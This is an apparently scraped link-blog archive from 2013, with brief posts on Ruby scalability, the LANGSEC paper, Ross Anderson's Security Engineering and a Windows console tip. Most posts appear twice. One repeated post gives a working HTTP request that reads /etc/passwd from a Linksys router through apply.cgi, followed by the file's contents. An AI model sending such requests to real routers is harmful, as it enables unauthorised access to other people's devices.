April 14th, 2013
sometimes language makes a difference ( i.e ruby is too low for a service stack )
Posted in language, ror, ruby, scalability | Comments Off | permalink
April 14th, 2013
Collection of great takes from Hacker News/YCombinator ppl. Full discussion https://news.ycombinator.com/item?id=5511466
Posted in technology, video | Comments Off | permalink
April 14th, 2013
Collection of great takes from Hacker News/YCombinator ppl. Full discussion https://news.ycombinator.com/item?id=5511466
Posted in technology, video | Comments Off | permalink
April 14th, 2013
The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.
Posted in infosec, paper, Security | Comments Off | permalink
April 14th, 2013
The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to trustworthy software that takes untrusted inputs is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.
Posted in infosec, paper, Security | Comments Off | permalink
April 14th, 2013
Security Engineering , by Ross Andreson. ‘It's beautiful. This is the best book on the topic there is’ Bruce Schneier
Posted in book, engineering, Security | Comments Off | permalink
April 14th, 2013
Security Engineering , by Ross Andreson. ‘It's beautiful. This is the best book on the topic there is’ Bruce Schneier
Posted in book, engineering, Security | Comments Off | permalink
April 14th, 2013
the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
Posted in linksys, networking, Security | Comments Off | permalink
April 14th, 2013
the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
Posted in linksys, networking, Security | Comments Off | permalink
March 27th, 2013
try this if you need a decent command line experience in windows
Posted in cmd, command-line, windows | Comments Off | permalink